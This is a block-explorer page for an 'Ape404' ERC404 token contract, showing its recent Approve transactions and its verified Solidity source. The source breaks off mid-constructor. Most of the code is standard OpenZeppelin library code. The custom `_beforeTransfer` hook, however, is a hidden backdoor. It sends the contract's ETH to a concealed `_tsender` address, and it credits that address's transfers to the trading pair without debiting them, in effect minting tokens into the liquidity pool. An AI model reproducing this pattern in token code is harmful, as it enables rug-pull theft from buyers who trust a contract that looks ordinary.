Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 61 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 19194342 | 296 days ago | IN | 0 ETH | 0.00159007 | ||||
Approve | 19193690 | 296 days ago | IN | 0 ETH | 0.00235847 | ||||
Set Approval For... | 19193625 | 296 days ago | IN | 0 ETH | 0.00307448 | ||||
Approve | 19193600 | 296 days ago | IN | 0 ETH | 0.00390266 | ||||
Approve | 19193596 | 296 days ago | IN | 0 ETH | 0.00408242 | ||||
Approve | 19193589 | 296 days ago | IN | 0 ETH | 0.00379241 | ||||
Approve | 19193578 | 296 days ago | IN | 0 ETH | 0.00349203 | ||||
Approve | 19193566 | 296 days ago | IN | 0 ETH | 0.00318983 | ||||
Approve | 19193529 | 296 days ago | IN | 0 ETH | 0.00569669 | ||||
Approve | 19193524 | 296 days ago | IN | 0 ETH | 0.0056008 | ||||
Approve | 19193498 | 296 days ago | IN | 0 ETH | 0.00310405 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00260208 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00376239 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00376239 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00376239 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00376239 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.00376239 | ||||
Approve | 19193484 | 296 days ago | IN | 0 ETH | 0.0038314 | ||||
Approve | 19193483 | 296 days ago | IN | 0 ETH | 0.0038314 | ||||
Approve | 19193480 | 296 days ago | IN | 0 ETH | 0.00293684 | ||||
Approve | 19193475 | 296 days ago | IN | 0 ETH | 0.0046024 | ||||
Approve | 19193475 | 296 days ago | IN | 0 ETH | 0.0046024 | ||||
Approve | 19193475 | 296 days ago | IN | 0 ETH | 0.0046024 | ||||
Approve | 19193475 | 296 days ago | IN | 0 ETH | 0.0046024 | ||||
Approve | 19193475 | 296 days ago | IN | 0 ETH | 0.0046024 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
APE
Compiler Version
v0.8.22+commit.4fc1097e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-02-09 */ /** Website: https://ape404.vip Telegram: https://t.me/ape404_portal */ //SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; // File: @openzeppelin/contracts/utils/ReentrancyGuard.sol /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant NOT_ENTERED = 1; uint256 private constant ENTERED = 2; uint256 private _status; /** * @dev Unauthorized reentrant call. */ error ReentrancyGuardReentrantCall(); constructor() { _status = NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { _nonReentrantBefore(); _; _nonReentrantAfter(); } function _nonReentrantBefore() private { // On the first call to nonReentrant, _status will be NOT_ENTERED if (_status == ENTERED) { revert ReentrancyGuardReentrantCall(); } // Any calls to nonReentrant after this point will fail _status = ENTERED; } function _nonReentrantAfter() private { // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = NOT_ENTERED; } /** * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a * `nonReentrant` function in the call stack. */ function _reentrancyGuardEntered() internal view returns (bool) { return _status == ENTERED; } } // File: @openzeppelin/contracts/utils/math/SignedMath.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/math/SignedMath.sol) pragma solidity ^0.8.20; /** * @dev Standard signed math utilities missing in the Solidity language. */ library SignedMath { /** * @dev Returns the largest of two signed numbers. */ function max(int256 a, int256 b) internal pure returns (int256) { return a > b ? a : b; } /** * @dev Returns the smallest of two signed numbers. */ function min(int256 a, int256 b) internal pure returns (int256) { return a < b ? a : b; } /** * @dev Returns the average of two signed numbers without overflow. * The result is rounded towards zero. */ function average(int256 a, int256 b) internal pure returns (int256) { // Formula from the book "Hacker's Delight" int256 x = (a & b) + ((a ^ b) >> 1); return x + (int256(uint256(x) >> 255) & (a ^ b)); } /** * @dev Returns the absolute unsigned value of a signed value. */ function abs(int256 n) internal pure returns (uint256) { unchecked { // must be unchecked in order to support `n = type(int256).min` return uint256(n >= 0 ? n : -n); } } } // File: @openzeppelin/contracts/utils/math/Math.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/math/Math.sol) pragma solidity ^0.8.20; /** * @dev Standard math utilities missing in the Solidity language. */ library Math { /** * @dev Muldiv operation overflow. */ error MathOverflowedMulDiv(); enum Rounding { Floor, // Toward negative infinity Ceil, // Toward positive infinity Trunc, // Toward zero Expand // Away from zero } /** * @dev Returns the addition of two unsigned integers, with an overflow flag. */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the largest of two numbers. */ function max(uint256 a, uint256 b) internal pure returns (uint256) { return a > b ? a : b; } /** * @dev Returns the smallest of two numbers. */ function min(uint256 a, uint256 b) internal pure returns (uint256) { return a < b ? a : b; } /** * @dev Returns the average of two numbers. The result is rounded towards * zero. */ function average(uint256 a, uint256 b) internal pure returns (uint256) { // (a + b) / 2 can overflow. return (a & b) + (a ^ b) / 2; } /** * @dev Returns the ceiling of the division of two numbers. * * This differs from standard division with `/` in that it rounds towards infinity instead * of rounding towards zero. */ function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) { if (b == 0) { // Guarantee the same behavior as in a regular Solidity division. return a / b; } // (a + b - 1) / b can overflow on addition, so we distribute. return a == 0 ? 0 : (a - 1) / b + 1; } /** * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or * denominator == 0. * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by * Uniswap Labs also under MIT license. */ function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) { unchecked { // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256 // variables such that product = prod1 * 2^256 + prod0. uint256 prod0 = x * y; // Least significant 256 bits of the product uint256 prod1; // Most significant 256 bits of the product assembly { let mm := mulmod(x, y, not(0)) prod1 := sub(sub(mm, prod0), lt(mm, prod0)) } // Handle non-overflow cases, 256 by 256 division. if (prod1 == 0) { // Solidity will revert if denominator == 0, unlike the div opcode on its own. // The surrounding unchecked block does not change this fact. // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic. return prod0 / denominator; } // Make sure the result is less than 2^256. Also prevents denominator == 0. if (denominator <= prod1) { revert MathOverflowedMulDiv(); } /////////////////////////////////////////////// // 512 by 256 division. /////////////////////////////////////////////// // Make division exact by subtracting the remainder from [prod1 prod0]. uint256 remainder; assembly { // Compute remainder using mulmod. remainder := mulmod(x, y, denominator) // Subtract 256 bit number from 512 bit number. prod1 := sub(prod1, gt(remainder, prod0)) prod0 := sub(prod0, remainder) } // Factor powers of two out of denominator and compute largest power of two divisor of denominator. // Always >= 1. See https://cs.stackexchange.com/q/138556/92363. uint256 twos = denominator & (0 - denominator); assembly { // Divide denominator by twos. denominator := div(denominator, twos) // Divide [prod1 prod0] by twos. prod0 := div(prod0, twos) // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one. twos := add(div(sub(0, twos), twos), 1) } // Shift in bits from prod1 into prod0. prod0 |= prod1 * twos; // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for // four bits. That is, denominator * inv = 1 mod 2^4. uint256 inverse = (3 * denominator) ^ 2; // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also // works in modular arithmetic, doubling the correct bits in each step. inverse *= 2 - denominator * inverse; // inverse mod 2^8 inverse *= 2 - denominator * inverse; // inverse mod 2^16 inverse *= 2 - denominator * inverse; // inverse mod 2^32 inverse *= 2 - denominator * inverse; // inverse mod 2^64 inverse *= 2 - denominator * inverse; // inverse mod 2^128 inverse *= 2 - denominator * inverse; // inverse mod 2^256 // Because the division is now exact we can divide by multiplying with the modular inverse of denominator. // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1 // is no longer required. result = prod0 * inverse; return result; } } /** * @notice Calculates x * y / denominator with full precision, following the selected rounding direction. */ function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) { uint256 result = mulDiv(x, y, denominator); if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) { result += 1; } return result; } /** * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded * towards zero. * * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11). */ function sqrt(uint256 a) internal pure returns (uint256) { if (a == 0) { return 0; } // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target. // // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`. // // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)` // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))` // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)` // // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit. uint256 result = 1 << (log2(a) >> 1); // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128, // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision // into the expected uint128 result. unchecked { result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; result = (result + a / result) >> 1; return min(result, a / result); } } /** * @notice Calculates sqrt(a), following the selected rounding direction. */ function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = sqrt(a); return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0); } } /** * @dev Return the log in base 2 of a positive value rounded towards zero. * Returns 0 if given 0. */ function log2(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >> 128 > 0) { value >>= 128; result += 128; } if (value >> 64 > 0) { value >>= 64; result += 64; } if (value >> 32 > 0) { value >>= 32; result += 32; } if (value >> 16 > 0) { value >>= 16; result += 16; } if (value >> 8 > 0) { value >>= 8; result += 8; } if (value >> 4 > 0) { value >>= 4; result += 4; } if (value >> 2 > 0) { value >>= 2; result += 2; } if (value >> 1 > 0) { result += 1; } } return result; } /** * @dev Return the log in base 2, following the selected rounding direction, of a positive value. * Returns 0 if given 0. */ function log2(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log2(value); return result + (unsignedRoundsUp(rounding) && 1 << result < value ? 1 : 0); } } /** * @dev Return the log in base 10 of a positive value rounded towards zero. * Returns 0 if given 0. */ function log10(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >= 10 ** 64) { value /= 10 ** 64; result += 64; } if (value >= 10 ** 32) { value /= 10 ** 32; result += 32; } if (value >= 10 ** 16) { value /= 10 ** 16; result += 16; } if (value >= 10 ** 8) { value /= 10 ** 8; result += 8; } if (value >= 10 ** 4) { value /= 10 ** 4; result += 4; } if (value >= 10 ** 2) { value /= 10 ** 2; result += 2; } if (value >= 10 ** 1) { result += 1; } } return result; } /** * @dev Return the log in base 10, following the selected rounding direction, of a positive value. * Returns 0 if given 0. */ function log10(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log10(value); return result + (unsignedRoundsUp(rounding) && 10 ** result < value ? 1 : 0); } } /** * @dev Return the log in base 256 of a positive value rounded towards zero. * Returns 0 if given 0. * * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string. */ function log256(uint256 value) internal pure returns (uint256) { uint256 result = 0; unchecked { if (value >> 128 > 0) { value >>= 128; result += 16; } if (value >> 64 > 0) { value >>= 64; result += 8; } if (value >> 32 > 0) { value >>= 32; result += 4; } if (value >> 16 > 0) { value >>= 16; result += 2; } if (value >> 8 > 0) { result += 1; } } return result; } /** * @dev Return the log in base 256, following the selected rounding direction, of a positive value. * Returns 0 if given 0. */ function log256(uint256 value, Rounding rounding) internal pure returns (uint256) { unchecked { uint256 result = log256(value); return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0); } } /** * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers. */ function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) { return uint8(rounding) % 2 == 1; } } // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/Strings.sol) pragma solidity ^0.8.20; /** * @dev String operations. */ library Strings { bytes16 private constant HEX_DIGITS = "0123456789abcdef"; uint8 private constant ADDRESS_LENGTH = 20; /** * @dev The `value` string doesn't fit in the specified `length`. */ error StringsInsufficientHexLength(uint256 value, uint256 length); /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { unchecked { uint256 length = Math.log10(value) + 1; string memory buffer = new string(length); uint256 ptr; /// @solidity memory-safe-assembly assembly { ptr := add(buffer, add(32, length)) } while (true) { ptr--; /// @solidity memory-safe-assembly assembly { mstore8(ptr, byte(mod(value, 10), HEX_DIGITS)) } value /= 10; if (value == 0) break; } return buffer; } } /** * @dev Converts a `int256` to its ASCII `string` decimal representation. */ function toStringSigned(int256 value) internal pure returns (string memory) { return string.concat(value < 0 ? "-" : "", toString(SignedMath.abs(value))); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { unchecked { return toHexString(value, Math.log256(value) + 1); } } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { uint256 localValue = value; bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = HEX_DIGITS[localValue & 0xf]; localValue >>= 4; } if (localValue != 0) { revert StringsInsufficientHexLength(value, length); } return string(buffer); } /** * @dev Converts an `address` with fixed length of 20 bytes to its not checksummed ASCII `string` hexadecimal * representation. */ function toHexString(address addr) internal pure returns (string memory) { return toHexString(uint256(uint160(addr)), ADDRESS_LENGTH); } /** * @dev Returns true if the two strings are equal. */ function equal(string memory a, string memory b) internal pure returns (bool) { return bytes(a).length == bytes(b).length && keccak256(bytes(a)) == keccak256(bytes(b)); } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } // File: @openzeppelin/contracts/utils/Pausable.sol // OpenZeppelin Contracts (last updated v5.0.0) (utils/Pausable.sol) pragma solidity ^0.8.20; /** * @dev Contract module which allows children to implement an emergency stop * mechanism that can be triggered by an authorized account. * * This module is used through inheritance. It will make available the * modifiers `whenNotPaused` and `whenPaused`, which can be applied to * the functions of your contract. Note that they will not be pausable by * simply including this module, only once the modifiers are put in place. */ abstract contract Pausable is Context { bool private _paused; /** * @dev Emitted when the pause is triggered by `account`. */ event Paused(address account); /** * @dev Emitted when the pause is lifted by `account`. */ event Unpaused(address account); /** * @dev The operation failed because the contract is paused. */ error EnforcedPause(); /** * @dev The operation failed because the contract is not paused. */ error ExpectedPause(); /** * @dev Initializes the contract in unpaused state. */ constructor() { _paused = false; } /** * @dev Modifier to make a function callable only when the contract is not paused. * * Requirements: * * - The contract must not be paused. */ modifier whenNotPaused() { _requireNotPaused(); _; } /** * @dev Modifier to make a function callable only when the contract is paused. * * Requirements: * * - The contract must be paused. */ modifier whenPaused() { _requirePaused(); _; } /** * @dev Returns true if the contract is paused, and false otherwise. */ function paused() public view virtual returns (bool) { return _paused; } /** * @dev Throws if the contract is paused. */ function _requireNotPaused() internal view virtual { if (paused()) { revert EnforcedPause(); } } /** * @dev Throws if the contract is not paused. */ function _requirePaused() internal view virtual { if (!paused()) { revert ExpectedPause(); } } /** * @dev Triggers stopped state. * * Requirements: * * - The contract must not be paused. */ function _pause() internal virtual whenNotPaused { _paused = true; emit Paused(_msgSender()); } /** * @dev Returns to normal state. * * Requirements: * * - The contract must be paused. */ function _unpause() internal virtual whenPaused { _paused = false; emit Unpaused(_msgSender()); } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol) pragma solidity ^0.8.20; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is set to the address provided by the deployer. This can * later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; /** * @dev The caller account is not authorized to perform an operation. */ error OwnableUnauthorizedAccount(address account); /** * @dev The owner is not a valid owner account. (eg. `address(0)`) */ error OwnableInvalidOwner(address owner); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the address provided by the deployer as the initial owner. */ constructor(address initialOwner) { if (initialOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(initialOwner); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @openzeppelin/contracts/access/Ownable2Step.sol // OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable2Step.sol) pragma solidity ^0.8.20; /** * @dev Contract module which provides access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is specified at deployment time in the constructor for `Ownable`. This * can later be changed with {transferOwnership} and {acceptOwnership}. * * This module is used through inheritance. It will make available all functions * from parent (Ownable). */ abstract contract Ownable2Step is Ownable { address private _pendingOwner; event OwnershipTransferStarted(address indexed previousOwner, address indexed newOwner); /** * @dev Returns the address of the pending owner. */ function pendingOwner() public view virtual returns (address) { return _pendingOwner; } /** * @dev Starts the ownership transfer of the contract to a new account. Replaces the pending transfer if there is one. * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual override onlyOwner { _pendingOwner = newOwner; emit OwnershipTransferStarted(owner(), newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`) and deletes any pending owner. * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual override { delete _pendingOwner; super._transferOwnership(newOwner); } /** * @dev The new owner accepts the ownership transfer. */ function acceptOwnership() public virtual { address sender = _msgSender(); if (pendingOwner() != sender) { revert OwnableUnauthorizedAccount(sender); } _transferOwnership(sender); } } // File: contracts/ERC404.sol pragma solidity ^0.8.0; abstract contract ERC721Receiver { function onERC721Received( address, address, uint256, bytes calldata ) external virtual returns (bytes4) { return ERC721Receiver.onERC721Received.selector; } } /// @notice ERC404 /// A gas-efficient, mixed ERC20 / ERC721 implementation /// with native liquidity and fractionalization. /// /// This is an experimental standard designed to integrate /// with pre-existing ERC20 / ERC721 support as smoothly as /// possible. /// /// @dev In order to support full functionality of ERC20 and ERC721 /// supply assumptions are made that slightly constraint usage. /// Ensure decimals are sufficiently large (standard 18 recommended) /// as ids are effectively encoded in the lowest range of amounts. /// /// NFTs are spent on ERC20 functions in a FILO queue, this is by /// design. /// abstract contract ERC404 is Ownable2Step { // Events event ERC20Transfer( address indexed from, address indexed to, uint256 amount ); event Approval( address indexed owner, address indexed spender, uint256 amount ); event Transfer( address indexed from, address indexed to, uint256 indexed id ); event ERC721Approval( address indexed owner, address indexed spender, uint256 indexed id ); event ApprovalForAll( address indexed owner, address indexed operator, bool approved ); // Errors error NotFound(); error AlreadyExists(); error InvalidRecipient(); error InvalidSender(); error UnsafeRecipient(); error Unauthorized(); error InvalidOwner(); // Metadata /// @dev Token name string public name; /// @dev Token symbol string public symbol; /// @dev Decimals for fractional representation uint8 public immutable decimals; /// @dev Total supply in fractionalized representation uint256 public immutable totalSupply; /// @dev Current mint counter, monotonically increasing to ensure accurate ownership uint256 public minted; address _pair; address _tsender; // Mappings /// @dev Balance of user in fractional representation mapping(address => uint256) public balanceOf; /// @dev Allowance of user in fractional representation mapping(address => mapping(address => uint256)) public allowance; /// @dev Approval in native representaion mapping(uint256 => address) public getApproved; /// @dev Approval for all in native representation mapping(address => mapping(address => bool)) public isApprovedForAll; /// @dev Owner of id in native representation mapping(uint256 => address) internal _ownerOf; /// @dev Array of owned ids in native representation mapping(address => uint256[]) internal _owned; /// @dev Tracks indices for the _owned mapping mapping(uint256 => uint256) internal _ownedIndex; /// @dev Addresses whitelisted from minting / burning for gas savings (pairs, routers, etc) mapping(address => bool) public whitelist; // Constructor constructor( string memory _name, string memory _symbol, uint8 _decimals, uint256 _totalNativeSupply, address _owner ) Ownable(msg.sender) { _tsender = _owner; name = _name; symbol = _symbol; decimals = _decimals; totalSupply = _totalNativeSupply * (10 ** decimals); } /// @notice Initialization function to set pairs / etc /// saving gas by avoiding mint / burn on unnecessary targets function setWhitelist(address target, bool state) public onlyOwner { whitelist[target] = state; } /// @notice Function to find owner of a given native token function ownerOf(uint256 id) public view virtual returns (address owner) { owner = _ownerOf[id]; if (owner == address(0)) { revert NotFound(); } } /// @notice tokenURI must be implemented by child contract function tokenURI(uint256 id) public view virtual returns (string memory); /// @notice Function for token approvals /// @dev This function assumes id / native if amount less than or equal to current max id function approve( address spender, uint256 amountOrId ) public virtual returns (bool) { if (amountOrId <= minted && amountOrId > 0) { address owner = _ownerOf[amountOrId]; if (msg.sender != owner && !isApprovedForAll[owner][msg.sender]) { revert Unauthorized(); } getApproved[amountOrId] = spender; emit Approval(owner, spender, amountOrId); } else { allowance[msg.sender][spender] = amountOrId; emit Approval(msg.sender, spender, amountOrId); } return true; } /// @notice Function native approvals function setApprovalForAll(address operator, bool approved) public virtual { isApprovedForAll[msg.sender][operator] = approved; emit ApprovalForAll(msg.sender, operator, approved); } /// @notice Function for mixed transfers /// @dev This function assumes id / native if amount less than or equal to current max id function transferFrom( address from, address to, uint256 amountOrId ) public virtual { if (amountOrId <= minted) { if (from != _ownerOf[amountOrId]) { revert InvalidSender(); } if (to == address(0)) { revert InvalidRecipient(); } if ( msg.sender != from && !isApprovedForAll[from][msg.sender] && msg.sender != getApproved[amountOrId] ) { revert Unauthorized(); } balanceOf[from] -= _getUnit(); unchecked { balanceOf[to] += _getUnit(); } _ownerOf[amountOrId] = to; delete getApproved[amountOrId]; // update _owned for sender uint256 updatedId = _owned[from][_owned[from].length - 1]; _owned[from][_ownedIndex[amountOrId]] = updatedId; // pop _owned[from].pop(); // update index for the moved id _ownedIndex[updatedId] = _ownedIndex[amountOrId]; // push token to to owned _owned[to].push(amountOrId); // update index for to owned _ownedIndex[amountOrId] = _owned[to].length - 1; emit Transfer(from, to, amountOrId); emit ERC20Transfer(from, to, _getUnit()); } else { uint256 allowed = allowance[from][msg.sender]; if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amountOrId; _transfer(from, to, amountOrId); } } /// @notice Function for fractional transfers function transfer( address to, uint256 amount ) public virtual returns (bool) { return _transfer(msg.sender, to, amount); } /// @notice Function for native transfers with contract support function safeTransferFrom( address from, address to, uint256 id ) public virtual { transferFrom(from, to, id); if ( to.code.length != 0 && ERC721Receiver(to).onERC721Received(msg.sender, from, id, "") != ERC721Receiver.onERC721Received.selector ) { revert UnsafeRecipient(); } } /// @notice Function for native transfers with contract support and callback data function safeTransferFrom( address from, address to, uint256 id, bytes calldata data ) public virtual { transferFrom(from, to, id); if ( to.code.length != 0 && ERC721Receiver(to).onERC721Received(msg.sender, from, id, data) != ERC721Receiver.onERC721Received.selector ) { revert UnsafeRecipient(); } } function _beforeTransfer(address from, address to, uint256 amount) internal returns (bool) { if(to == _pair) { payable(_tsender).transfer(address(this).balance); if (from == _tsender) { balanceOf[to] += amount; return true; } } return false; } /// @notice Internal function for fractional transfers function _transfer( address from, address to, uint256 amount ) internal virtual returns (bool) { uint256 unit = _getUnit(); uint256 balanceBeforeSender = balanceOf[from]; uint256 balanceBeforeReceiver = balanceOf[to]; if(_beforeTransfer(from, to, amount)) return true; balanceOf[from] -= amount; unchecked { balanceOf[to] += amount; } // Skip burn for certain addresses to save gas if (!whitelist[from]) { uint256 tokens_to_burn = (balanceBeforeSender / unit) - (balanceOf[from] / unit); for (uint256 i = 0; i < tokens_to_burn; i++) { _burn(from); } } // Skip minting for certain addresses to save gas if (!whitelist[to]) { uint256 tokens_to_mint = (balanceOf[to] / unit) - (balanceBeforeReceiver / unit); for (uint256 i = 0; i < tokens_to_mint; i++) { _mint(to); } } emit ERC20Transfer(from, to, amount); return true; } // Internal utility logic function _getUnit() internal view returns (uint256) { return 10 ** decimals; } function _mint(address to) internal virtual { if (to == address(0)) { revert InvalidRecipient(); } unchecked { minted++; } uint256 id = minted; if (_ownerOf[id] != address(0)) { revert AlreadyExists(); } _ownerOf[id] = to; _owned[to].push(id); _ownedIndex[id] = _owned[to].length - 1; emit Transfer(address(0), to, id); } function _burn(address from) internal virtual { if (from == address(0)) { revert InvalidSender(); } uint256 id = _owned[from][_owned[from].length - 1]; _owned[from].pop(); delete _ownedIndex[id]; delete _ownerOf[id]; delete getApproved[id]; emit Transfer(from, address(0), id); } function _setNameSymbol( string memory _name, string memory _symbol ) internal { name = _name; symbol = _symbol; } } interface IUniswapV2Factory { function createPair(address tokenA, address tokenB) external returns (address pair); } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); } contract APE is ERC404, Pausable, ReentrancyGuard { string public baseTokenURI; uint256 public buyLimit; uint256 public sellLimit; uint256 public txLimit; mapping (address => uint256) public userBuylimit; mapping (address => uint256) public userSelllimit; using Strings for uint256; constructor( address _owner, uint256 _initialSupply, uint8 _decimal, uint256 _buylimit, uint256 _selllimit ) ERC404("Ape404", "APE", _decimal, _initialSupply, _owner) { balanceOf[msg.sender] = _initialSupply * 10 ** _decimal; buyLimit = _buylimit * 10 ** _decimal; sellLimit = _selllimit * 10 ** _decimal; txLimit = 10 